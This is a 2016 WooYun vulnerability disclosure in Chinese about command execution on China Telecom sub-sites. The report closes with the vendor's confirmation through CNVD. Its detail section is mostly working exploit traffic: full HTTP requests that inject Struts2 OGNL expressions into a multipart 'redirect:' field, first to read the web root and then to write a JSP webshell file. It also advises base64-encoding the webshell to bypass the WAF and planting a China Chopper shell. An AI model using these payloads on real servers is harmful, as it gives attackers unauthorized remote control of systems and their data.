当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0214431

漏洞标题:中国电信多个分站命令执行漏洞修复不当(绕过waf写webshell)

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2016-05-30 17:44

修复时间:2016-07-16 18:00

公开时间:2016-07-16 18:00

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-30: 细节已通知厂商并且等待厂商处理中
2016-06-01: 厂商已经确认,细节仅向厂商公开
2016-06-11: 细节向核心白帽子及相关领域专家公开
2016-06-21: 细节向普通白帽子公开
2016-07-01: 细节向实习白帽子公开
2016-07-16: 细节向公众公开

简要描述:

中国电信多个分站命令执行漏洞修复不当(绕过waf写webshell)

详细说明:

http://**.**.**.**:8080/emallTelOmsWeb/sysmgr/login/login.action
**.**.**.**/integrateSys/checkNum.action
**.**.**.**/item/queryGoods.action

GET /emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1
Host: **.**.**.**:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=389b3f46292c4ee795f3f64e37d6f4db
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=7162A0058CDFF12F9D688291EFBF381F.b; TS01861ca2=018ac74bc404a46a20c97c350297187bbcdf602fb91b78c975361bc471aa231694a2486bb64c9a6ed89eb0460f926333cf4b4fecbf; TS01c98fdf=018ac74bc4d91c43f67f047b17a9d4eb3155e36b7aaee0491e3d4485516646565a63b75a7e
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alx-4.0
Content-Length: 220
--389b3f46292c4ee795f3f64e37d6f4db
Content-Disposition: form-data; name="redirect:/${(#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/"))}"
-1
--389b3f46292c4ee795f3f64e37d6f4db--


可以getshell

GET /emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1
Host: **.**.**.**:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=389b3f46292c4ee795f3f64e37d6f4db
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=7162A0058CDFF12F9D688291EFBF381F.b; TS01861ca2=018ac74bc404a46a20c97c350297187bbcdf602fb91b78c975361bc471aa231694a2486bb64c9a6ed89eb0460f926333cf4b4fecbf; TS01c98fdf=018ac74bc4d91c43f67f047b17a9d4eb3155e36b7aaee0491e3d4485516646565a63b75a7e
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alx-4.0
Content-Length: 1750
--389b3f46292c4ee795f3f64e37d6f4db
Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/home/ecss/emallTelOmsWeb8083/webapps/emallTelOmsWeb/s.jsp")).append("小马十六进制编码").close()}"
-1
--389b3f46292c4ee795f3f64e37d6f4db--


然后写入菜刀马(小马base64加密提交即可绕过waf)

漏洞证明:

http://**.**.**.**:8080/emallTelOmsWeb/f.jsp?z0=utf-8
**.**.**.**/s.txt
**.**.**.**/s.txt

屏幕快照 2016-05-30 下午3.17.54.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-06-01 17:52

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评价